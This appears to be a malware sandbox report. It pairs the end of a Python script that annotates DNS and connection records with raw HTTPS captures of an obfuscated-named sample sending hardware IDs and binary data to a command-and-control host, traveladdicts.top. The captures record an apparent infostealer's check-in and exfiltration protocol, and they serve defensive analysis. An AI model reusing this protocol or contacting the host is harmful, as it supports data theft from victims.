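    """Attach the resolved name(s) to each connection and flag two analyst checks:
    a paste-service destination, and a destination with no earlier DNS answer
    (which points at a hard-coded address rather than a resolved one)."""
    results = []
    for sport, dip, dport, started in connections:
        names = lookup_names(dns_answers, dip, started.isoformat())
        results.append({
            "src_port": sport,
            "dst": f"{dip}:{dport}",
            "names": names,
            "no_prior_dns": not names,
            "paste_service": bool(set(names) & PASTE_SERVICES),
        })
    return results


def unused_answers(dns_answers, connections) -> list[tuple[str, str]]:
    """Resolved (name, address) pairs the sample never connected to, i.e. the
    other A records in each reply."""
    used = {dip for _, dip, _, _ in connections}
    return sorted({(name, addr) for _, name, addr, _ in dns_answers if addr not in used})


if __name__ == "__main__":
    for row in annotate_connections(DNS_ANSWERS, CONNECTIONS):
        print(row)
    print("resolved but not contacted:", unused_answers(DNS_ANSWERS, CONNECTIONS))
```

Cloudflare-fronted names return several A records; only one per name is used here, so the unused records are still worth recording as infrastructure for the same hostnames.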
Session ID: 0
Source IP: 192.168.2.4
Source Port: 49734
Destination IP: 104.21.60.241
Destination Port: 443
PID: 7412
Process: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe

2025-01-28 15:15:58 UTC, 264 bytes, OUT:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: traveladdicts.top

2025-01-28 15:15:58 UTC, 8 bytes, OUT:
Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life

2025-01-28 15:15:58 UTC, 1135 bytes, IN:
HTTP/1.1 200 OK
Date: Tue, 28 Jan 2025 15:15:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ji2iv0cji9n3pccniv4gn63acd; expires=Sat, 24 May 2025 09:02:37 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VLRnUIMkQZanXtFR2qPwfV2PB%2FZE5C%2B7jlrv%2F2GEZgAGEbcOQZo0OMVVE7dPeDrjxW1y7V9YMJNUKvVtVW7oSy%2BF%2FXhlCz6pwlKxEk5z8obgxWXqS12QQmy3XwpMjp32Gp%2Bvkw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9091f0e019aa43c7-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1572&rtt_var=616&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=908&delivery_rate=1737061&cwnd=219&unsent_bytes=0&cid=84de2c2c5b4bcc56&ts=821&x=0"

2025-01-28 15:15:58 UTC, 7 bytes, IN:
Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2\r\nok\r\n

2025-01-28 15:15:58 UTC, 5 bytes, IN:
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0\r\n\r\n


Session ID: 1
Source IP: 192.168.2.4
Source Port: 49736
Destination IP: 104.21.60.241
Destination Port: 443
PID: 7412
Process: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe

2025-01-28 15:15:59 UTC, 265 bytes, OUT:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 49
Host: traveladdicts.top

2025-01-28 15:15:59 UTC, 49 bytes, OUT:
Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 32 79 61 6e 31 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=MeHdy4--pl2yan1&j=

2025-01-28 15:15:59 UTC, 1129 bytes, IN:
HTTP/1.1 200 OK
Date: Tue, 28 Jan 2025 15:15:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=773i6bvt2hvmv1k1nkh25bpv26; expires=Sat, 24 May 2025 09:02:38 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KkDdyab3ZGMnWzHJ2dODs4OOVRZ7xpTdF06%2FWC6QwLK%2FTpsPFvenk9UxK3TvBzblHCIsBJdQoZ0rt0me6ievTrFHTuknQ5wszkg28H%2Bsam2G4cYc7UY2nM7qJa1CZEbbejsdrg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9091f0e82a44ef9d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2041&min_rtt=2023&rtt_var=771&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=950&delivery_rate=1443400&cwnd=175&unsent_bytes=0&cid=12dc5fb2f04f3ae8&ts=493&x=0"

2025-01-28 15:15:59 UTC, 240 bytes, IN:
Data Raw: 34 36 65 0d 0a 53 2f 7a 59 48 73 32 66 63 6b 64 35 34 2b 32 5a 56 77 47 35 78 72 47 77 69 56 74 54 76 5a 42 6c 65 47 78 50 5a 51 35 33 4e 63 4d 77 33 71 34 38 39 36 74 65 5a 51 71 47 7a 36 4d 6a 63 38 79 6a 6e 5a 4c 6f 50 33 47 48 39 67 51 55 48 79 70 4a 4c 41 46 59 34 58 47 61 75 58 4b 2b 2b 6c 35 6c 48 4a 76 50 6f 77 78 36 6d 36 50 66 6b 72 4e 35 4e 74 66 79 42 42 51 4f 4c 67 35 68 42 31 6d 67 49 35 43 2f 64 71 6a 38 46 69 59 56 6a 6f 6a 38 4d 6d 44 54 71 4e 6a 64 34 54 5a 78 6b 62 49 41 41 6b 35 31 52 30 4d 53 51 61 49 47 6e 61 74 31 37 2b 4a 65 50 46 75 47 67 37 74 74 49 39 69 6a 30 39 7a 76 50 7a 6a 56 2b 41 30 63 44 79 73 50 66 68 35 54 71 79 4f 65 76 48 65 69 39 51 49 72 48 34 6d 44 2b 6a 68 67 6d 2b 71
Data Ascii: 46e\r\nS/zYHs2fckd54+2ZVwG5xrGwiVtTvZBleGxPZQ53NcMw3q4896teZQqGz6Mjc8yjnZLoP3GH9gQUHypJLAFY4XGauXK++l5lHJvPowx6m6PfkrN5NtfyBBQOLg5hB1mgI5C/dqj8FiYVjoj8MmDTqNjd4TZxkbIAAk51R0MSQaIGnat17+JePFuGg7ttI9ij09zvPzjV+A0cDysPfh5TqyOevHei9QIrH4mD+jhgm+q

2025-01-28 15:15:59 UTC, 901 bytes, IN:
Data Raw: 54 31 66 4e 35 61 5a 2b 68 4e 52 6b 66 50 42 4a 68 42 56 48 68 4e 74 43 6a 50 4b 6a 78 55 48 31 62 69 59 50 31 4d 47 44 55 6f 39 4c 53 2b 54 59 78 33 50 6f 50 48 67 51 69 43 47 4d 62 58 61 59 68 6c 37 31 7a 71 50 55 57 4b 68 6a 42 77 62 73 79 65 35 76 38 6b 2f 4c 37 4f 6a 4c 4c 2f 78 5a 61 45 57 4d 65 4c 42 4a 62 34 58 48 65 76 48 4b 75 38 42 41 33 45 34 71 45 2f 69 64 6f 30 71 6e 65 30 75 59 7a 50 74 7a 79 41 42 41 45 49 67 31 6f 47 46 71 6e 4b 5a 37 36 4d 75 2f 36 43 47 56 44 77 61 7a 2b 4a 57 54 58 73 70 48 6f 71 79 5a 2f 78 72 49 41 46 6b 35 31 52 32 51 51 56 4b 49 69 6b 62 6c 30 70 4f 38 51 4e 78 32 4d 69 75 6b 7a 5a 74 57 75 30 4d 44 68 4e 7a 66 63 2b 77 77 54 43 79 6f 44 4c 46 73 58 70 6a 48 65 34 6a 79 4f 38 42 73 70 45 5a 61 50 75 79 6f 74 77 75
Data Ascii: T1fN5aZ+hNRkfPBJhBVHhNtCjPKjxUH1biYP1MGDUo9LS+TYx3PoPHgQiCGMbXaYhl71zqPUWKhjBwbsye5v8k/L7OjLL/xZaEWMeLBJb4XHevHKu8BA3E4qE/ido0qne0uYzPtzyABAEIg1oGFqnKZ76Mu/6CGVDwaz+JWTXspHoqyZ/xrIAFk51R2QQVKIikbl0pO8QNx2MiukzZtWu0MDhNzfc+wwTCyoDLFsXpjHe4jyO8BspEZaPuyotwu

2025-01-28 15:15:59 UTC, 1369 bytes, IN:
Data Raw: 34 35 32 36 0d 0a 77 76 63 63 43 38 48 6c 6f 4a 49 55 63 30 56 56 69 75 4a 70 61 36 66 61 76 77 46 43 51 57 6a 59 62 34 4f 57 2f 54 71 64 2f 57 35 44 45 35 33 50 6f 56 46 41 41 72 41 57 77 51 46 2b 39 70 6d 61 49 38 39 37 30 30 4b 77 79 56 68 4c 6b 41 59 4e 57 71 31 4d 53 72 4a 6e 2f 47 73 67 41 57 54 6e 56 48 59 68 68 63 72 53 36 58 75 33 2b 76 39 78 34 71 45 59 6d 48 2b 7a 68 69 30 4b 7a 56 33 2b 41 32 50 74 6a 36 42 42 59 4c 49 41 51 73 57 78 65 6d 4d 64 37 69 50 49 72 7a 45 7a 51 4b 77 37 72 34 4f 32 33 63 73 70 50 4e 70 53 42 78 32 50 35 48 51 6b 34 6e 41 47 73 52 57 71 73 71 6d 72 35 78 6f 50 51 5a 4c 41 6d 4c 67 2f 55 6e 62 74 47 68 33 64 37 75 4e 6a 48 65 38 77 6b 51 42 57 31 4a 4c 42 4a 50 34 58 48 65 6c 58 47 2f 37 78 6f 75 43 73 4f 36 2b 44 74
Data Ascii: 4526\r\nwvccC8HloJIUc0VViuJpa6favwFCQWjYb4OW/Tqd/W5DE53PoVFAArAWwQF+9pmaI89700KwyVhLkAYNWq1MSrJn/GsgAWTnVHYhhcrS6Xu3+v9x4qEYmH+zhi0KzV3+A2Ptj6BBYLIAQsWxemMd7iPIrzEzQKw7r4O23cspPNpSBx2P5HQk4nAGsRWqsqmr5xoPQZLAmLg/UnbtGh3d7uNjHe8wkQBW1JLBJP4XHelXG/7xouCsO6+Dt

2025-01-28 15:15:59 UTC, 1369 bytes, IN:
Data Raw: 2f 33 6f 4c 7a 75 66 37 55 6b 44 54 69 6f 4c 4c 45 30 58 71 79 57 61 75 58 43 6d 38 52 30 6b 48 34 61 43 2f 7a 56 6c 33 61 48 53 32 65 4d 31 50 74 58 2b 41 78 59 48 4b 77 74 76 46 6c 48 68 5a 39 36 39 5a 4f 2b 6c 55 41 51 57 69 6f 50 37 4e 6e 4c 63 35 4a 32 53 35 54 38 78 6e 36 6f 52 43 68 6b 71 47 43 49 4d 46 36 59 6c 33 75 49 38 70 65 38 56 4b 78 2b 4c 69 76 38 35 61 64 75 68 77 64 72 74 50 6a 33 58 39 77 67 63 43 79 41 41 5a 78 5a 46 73 79 71 61 74 48 44 76 73 31 41 69 41 38 48 58 75 78 42 30 32 4c 54 56 30 61 73 6d 66 38 61 79 41 42 5a 4f 64 55 64 73 47 31 75 71 4c 70 57 78 65 4b 76 39 48 53 34 56 6a 34 62 33 50 57 2f 63 74 74 37 58 34 7a 4d 34 32 76 34 4b 47 52 77 75 42 69 78 62 46 36 59 78 33 75 49 38 69 4d 34 6e 42 6c 75 65 77 65 4a 31 5a 4e 66 6b
Data Ascii: /3oLzuf7UkDTioLLE0XqyWauXCm8R0kH4aC/zVl3aHS2eM1PtX+AxYHKwtvFlHhZ969ZO+lUAQWioP7NnLc5J2S5T8xn6oRChkqGCIMF6Yl3uI8pe8VKx+Liv85aduhwdrtPj3X9wgcCyAAZxZFsyqatHDvs1AiA8HXuxB02LTV0asmf8ayABZOdUdsG1uqLpWxeKv9HS4Vj4b3PW/ctt7X4zM42v4KGRwuBixbF6Yx3uI8iM4nBlueweJ1ZNfk

2025-01-28 15:15:59 UTC, 1369 bytes, IN:
Data Raw: 6f 2b 31 4c 49 59 56 42 64 74 41 47 42 56 44 2b 45 75 6c 72 4a 79 72 50 73 62 4b 52 65 41 68 76 30 77 61 39 79 72 31 4e 76 73 4f 54 66 4e 39 51 6f 54 44 69 59 4f 5a 68 46 57 71 6d 6e 51 2b 6e 75 33 76 55 68 6c 4b 59 61 5a 36 7a 59 6a 78 4f 72 4b 6b 75 77 31 63 59 65 79 43 67 67 50 4b 42 56 6f 47 6c 79 7a 49 70 69 36 65 62 33 36 48 43 38 55 67 6f 66 32 4e 6d 76 4a 70 4e 37 53 2b 53 73 33 31 50 78 48 56 45 34 71 48 79 78 4e 46 35 41 2b 6c 66 70 6a 34 65 52 51 49 68 66 42 31 37 73 32 61 64 61 71 77 64 62 74 4d 6a 4c 52 2b 67 49 53 43 69 63 4b 59 78 35 64 71 43 47 65 74 58 6d 6e 39 68 59 72 47 6f 65 44 39 6e 55 74 6d 36 50 4c 6b 72 4e 35 46 73 58 2f 41 51 30 66 47 41 42 73 52 42 65 2b 5a 34 66 36 65 36 4f 39 53 47 55 57 6a 59 58 32 4d 47 66 54 6f 39 44 54 35
Data Ascii: o+1LIYVBdtAGBVD+EulrJyrPsbKReAhv0wa9yr1NvsOTfN9QoTDiYOZhFWqmnQ+nu3vUhlKYaZ6zYjxOrKkuw1cYeyCggPKBVoGlyzIpi6eb36HC8Ugof2NmvJpN7S+Ss31PxHVE4qHyxNF5A+lfpj4eRQIhfB17s2adaqwdbtMjLR+gISCicKYx5dqCGetXmn9hYrGoeD9nUtm6PLkrN5FsX/AQ0fGABsRBe+Z4f6e6O9SGUWjYX2MGfTo9DT5

2025-01-28 15:15:59 UTC, 1369 bytes, IN:
Data Raw: 2b 52 30 4a 4f 49 77 70 71 46 46 61 70 49 5a 36 38 64 71 76 2b 47 53 59 63 69 49 6e 77 4e 6d 6e 55 6f 39 58 57 36 7a 49 32 30 66 51 43 45 51 64 74 53 53 77 53 54 2b 46 78 33 70 78 66 76 65 38 69 4b 78 69 61 7a 2b 52 37 65 70 75 6a 33 35 4b 7a 65 54 72 58 2f 52 55 66 42 79 55 44 5a 52 56 54 71 79 53 5a 75 6e 6d 69 2b 42 51 72 48 34 61 50 39 7a 70 6b 30 36 76 58 30 75 52 35 66 35 2f 31 48 31 70 57 62 53 64 6e 41 33 61 76 49 6f 7a 36 59 2b 48 6b 55 43 49 58 77 64 65 37 4f 32 72 61 72 4e 33 65 34 7a 30 6a 33 2f 6b 4f 46 51 38 69 42 32 38 55 58 61 6b 37 6d 4c 70 33 70 2f 6f 59 49 52 57 54 6a 76 52 31 4c 5a 75 6a 79 35 4b 7a 65 51 44 4a 39 51 41 56 54 41 51 41 64 78 52 64 6f 69 4b 53 2b 6d 50 68 35 46 41 69 46 38 48 58 75 7a 68 76 31 71 44 42 33 75 73 35 4f 4e
Data Ascii: +R0JOIwpqFFapIZ68dqv+GSYciInwNmnUo9XW6zI20fQCEQdtSSwST+Fx3pxfve8iKxiaz+R7epuj35KzeTrX/RUfByUDZRVTqySZunmi+BQrH4aP9zpk06vX0uR5f5/1H1pWbSdnA3avIoz6Y+HkUCIXwde7O2rarN3e4z0j3/kOFQ8iB28UXak7mLp3p/oYIRWTjvR1LZujy5KzeQDJ9QAVTAQAdxRdoiKS+mPh5FAiF8HXuzhv1qDB3us5ON

2025-01-28 15:15:59 UTC, 1369 bytes, IN:
Data Raw: 41 43 67 47 59 42 39 51 72 7a 75 66 73 48 43 75 2b 68 63 75 43 59 71 64 38 44 31 67 31 61 7a 61 30 75 55 35 4d 4e 4c 79 52 31 52 4f 4b 68 38 73 54 52 65 45 43 6f 6d 73 64 75 33 65 42 7a 4d 52 68 6f 50 74 50 6d 4c 59 73 74 37 43 71 33 64 78 7a 76 55 57 57 6c 59 37 46 33 73 53 53 4f 38 77 33 72 31 77 37 36 56 51 4c 68 53 50 67 76 41 78 61 74 36 73 30 4e 66 75 4d 7a 33 54 38 77 38 54 42 43 67 43 61 68 39 55 72 79 61 66 74 6e 69 6d 38 78 6c 6c 56 63 47 49 34 33 55 37 6d 35 4c 44 31 66 4d 30 49 5a 33 41 42 41 73 66 4f 41 70 38 45 78 57 4f 4b 70 4b 35 65 61 6a 74 55 44 70 56 6d 4d 2f 38 4f 53 4f 44 35 4e 50 57 35 7a 6f 32 30 66 30 4b 46 51 6b 6d 43 47 59 62 52 61 34 73 6c 72 5a 30 6f 75 38 61 4c 77 6d 49 68 76 59 37 61 38 6d 6e 6b 35 79 72 50 69 6d 66 71 6b 63
Data Ascii: ACgGYB9QrzufsHCu+hcuCYqd8D1g1aza0uU5MNLyR1ROKh8sTReEComsdu3eBzMRhoPtPmLYst7Cq3dxzvUWWlY7F3sSSO8w3r1w76VQLhSPgvAxat6s0NfuMz3T8w8TBCgCah9Uryaftnim8xllVcGI43U7m5LD1fM0IZ3ABAsfOAp8ExWOKpK5eajtUDpVmM/8OSOD5NPW5zo20f0KFQkmCGYbRa4slrZ0ou8aLwmIhvY7a8mnk5yrPimfqkc

2025-01-28 15:15:59 UTC, 1369 bytes, IN:
Data Raw: 31 4e 62 46 37 6c 70 78 76 70 4a 72 50 4d 65 49 67 32 51 77 74 6f 34 61 4e 65 70 33 4e 6d 72 64 33 48 5a 73 6c 39 4b 51 47 30 44 66 56 55 50 38 58 76 46 37 79 2f 34 72 55 49 36 56 5a 6a 50 37 58 55 37 69 65 71 54 77 4b 74 68 63 5a 6a 78 46 51 67 49 4c 68 46 76 55 6d 6d 66 43 6f 6d 73 64 72 53 2f 4e 69 49 4b 69 4a 6e 32 4a 31 33 6c 69 74 37 54 36 44 64 7a 37 75 51 4b 43 67 30 6f 41 46 49 72 57 61 59 39 6d 62 52 36 72 37 31 65 5a 52 54 42 31 38 4a 31 4b 35 75 62 6e 5a 4c 7a 65 57 6d 66 78 77 51 55 41 43 6f 52 66 56 68 30 74 6a 2b 55 6f 54 36 4a 2b 67 45 73 44 59 79 64 75 33 73 6a 33 65 53 4c 67 71 56 35 4e 63 36 79 58 30 70 63 64 6c 49 2f 51 67 66 7a 4e 74 43 6a 50 4c 6d 39 53 48 64 56 77 5a 32 37 62 53 4f 63 70 38 48 41 37 54 6f 6e 33 4c 55 35 4a 43 34 6d
Data Ascii: 1NbF7lpxvpJrPMeIg2Qwto4aNep3Nmrd3HZsl9KQG0DfVUP8XvF7y/4rUI6VZjP7XU7ieqTwKthcZjxFQgILhFvUmmfComsdrS/NiIKiJn2J13lit7T6Ddz7uQKCg0oAFIrWaY9mbR6r71eZRTB18J1K5ubnZLzeWmfxwQUACoRfVh0tj+UoT6J+gEsDYydu3sj3eSLgqV5Nc6yX0pcdlI/QgfzNtCjPLm9SHdVwZ27bSOcp8HA7Ton3LU5JC4m

2025-01-28 15:15:59 UTC, 1369 bytes, IN:
Data Raw: 66 7a 63 73 76 70 4b 2f 2b 76 44 32 73 43 77 5a 6d 37 62 54 47 56 35 4d 47 53 73 33 6c 32 33 4f 41 56 48 41 30 37 42 43 73 72 61 5a 51 71 6b 4c 52 37 75 63 67 54 4e 42 69 42 68 4d 55 4c 51 74 57 76 31 4e 37 39 42 77 2f 71 38 51 6b 55 43 54 73 57 4c 46 73 58 72 6d 6e 47 67 7a 7a 6e 76 53 39 72 57 35 6e 50 6f 33 56 57 32 4b 72 64 31 66 30 6f 66 4f 72 78 46 68 6b 4f 4a 6b 63 69 56 56 48 68 63 63 7a 30 50 4b 76 73 55 48 31 4c 30 39 53 75 5a 6a 53 4c 39 73 79 63 38 6e 6b 6e 6e 36 70 56 56 45 34 2f 52 7a 52 56 45 4b 49 37 6a 4c 78 2f 75 66 35 58 47 79 57 6e 6a 50 77 7a 59 4e 57 7a 77 70 44 45 4f 6a 72 54 2f 67 41 4d 4d 42 4d 53 62 78 74 5a 70 6a 2b 50 2b 6a 4c 76 38 6c 42 39 49 73 47 65 38 54 49 76 6b 2b 6a 43 77 65 55 79 4a 39 69 79 4f 46 52 4f 4e 55 63 30 56
Data Ascii: fzcsvpK/+vD2sCwZm7bTGV5MGSs3l23OAVHA07BCsraZQqkLR7ucgTNBiBhMULQtWv1N79Bw/q8QkUCTsWLFsXrmnGgzznvS9rW5nPo3VW2Krd1f0ofOrxFhkOJkciVVHhccz0PKvsUH1L09SuZjSL9syc8nknn6pVVE4/RzRVEKI7jLx/uf5XGyWnjPwzYNWzwpDEOjrT/gAMMBMSbxtZpj+P+jLv8lB9IsGe8TIvk+jCweUyJ9iyOFRONUc0V


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49738 | 104.21.60.241 | 443 | 7412 | C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-28 15:16:01 UTC | 280 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=XCBEHHM26E12S5C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 18147
Host: traveladdicts.top
2025-01-28 15:16:01 UTC | 15331 | OUT | Data Raw: (hex dump omitted)
Data Ascii: --XCBEHHM26E12S5CContent-Disposition: form-data; name="hwid"8F80B2DB807DDED22F2109764D00B0F1--XCBEHHM26E12S5CContent-Disposition: form-data; name="pid"2--XCBEHHM26E12S5CContent-Disposition: form-data; name="lid"MeHdy4--pl2yan1--XCB
2025-01-28 15:16:01 UTC | 2816 | OUT | Data Raw: (non-printable binary payload, hex dump omitted)
2025-01-28 15:16:13 UTC | 1143 | IN | HTTP/1.1 200 OK
Date: Tue, 28 Jan 2025 15:16:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=r5atj0ufh5dkmek95rgunqd0lf; expires=Sat, 24 May 2025 09:02:51 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m09N9tbEHJwwANVDAPP%2BUhxzf9SA%2B8JYx0cKEK9x7TgfgvTvt2JM5PeD5r%2BH5CXYhQZrZ8Emn4d%2BZRbnTfWzNEFqs%2B1%2Fs2pYbDyJhL9PQY9s3PzsYuLaD99Oa2pB7M%2Fr2flSyg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9091f0f2d9fa1a3c-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2082&min_rtt=2075&rtt_var=793&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2841&recv_bytes=19107&delivery_rate=1367041&cwnd=229&unsent_bytes=0&cid=e7c655c5a59b7b4c&ts=12196&x=0"
2025-01-28 15:16:13 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-28 15:16:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49743 | 104.21.60.241 | 443 | 7412 | C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-28 15:16:13 UTC | 275 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=FB3100XCJPK
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8744
Host: traveladdicts.top
2025-01-28 15:16:13 UTC | 8744 | OUT | Data Raw: (hex dump omitted)
Data Ascii: --FB3100XCJPKContent-Disposition: form-data; name="hwid"8F80B2DB807DDED22F2109764D00B0F1--FB3100XCJPKContent-Disposition: form-data; name="pid"2--FB3100XCJPKContent-Disposition: form-data; name="lid"MeHdy4--pl2yan1--FB3100XCJPKCo
2025-01-28 15:16:25 UTC | 1133 | IN | HTTP/1.1 200 OK
Date: Tue, 28 Jan 2025 15:16:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=mt8d0l9o7vga9885knqf9dclk8; expires=Sat, 24 May 2025 09:03:04 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ap2PrluycDd3LYKgoZG5S7f1QDqXBqsjdbtGYNhexGlV0tB%2FydOE1GhlkBNQPQ0cY%2B0wc95GJ6mnYU9Hd8E8LAR20Ji%2Ff3sGPtUaH9uVTHiT5yvUQh09VLdOohWAv3gqzrGTMA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9091f142db13c42c-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1648&rtt_var=629&sent=7&recv=15&lost=0&retrans=0&sent_bytes=2841&recv_bytes=9677&delivery_rate=1723730&cwnd=232&unsent_bytes=0&cid=00283c2f59b3b97a&ts=11988&x=0"
2025-01-28 15:16:25 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-28 15:16:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49744 | 104.21.60.241 | 443 | 7412 | C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-28 15:16:26 UTC | 278 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=2049G0Z2PZWMT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20409
Host: traveladdicts.top
2025-01-28 15:16:26 UTC | 15331 | OUT | Data Raw: (hex dump omitted)
Data Ascii: --2049G0Z2PZWMTContent-Disposition: form-data; name="hwid"8F80B2DB807DDED22F2109764D00B0F1--2049G0Z2PZWMTContent-Disposition: form-data; name="pid"3--2049G0Z2PZWMTContent-Disposition: form-data; name="lid"MeHdy4--pl2yan1--2049G0Z2P
2025-01-28 15:16:26 UTC | 5078 | OUT | Data Raw: (non-printable binary payload, hex dump omitted)
2025-01-28 15:16:38 UTC | 1137 | IN | HTTP/1.1 200 OK
Date: Tue, 28 Jan 2025 15:16:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=17g2o9tefhmi0v3580bg3lj208; expires=Sat, 24 May 2025 09:03:17 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wWq60JWQcllB80Q8QiuYrboEaXEuhqhqmDLPFrX%2B4yd2b0WDsyfxafojNs2V8D%2FHvO9J%2BxvYzAccvZWxC0dPGRso6wfcYy%2F60BXkubhK6VQOCW918RKWjqlndws2aSYrCjQDHA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9091f19309bb32d9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2012&min_rtt=1995&rtt_var=783&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2841&recv_bytes=21367&delivery_rate=1368322&cwnd=176&unsent_bytes=0&cid=5bcc7ac5ac7487b0&ts=12188&x=0"
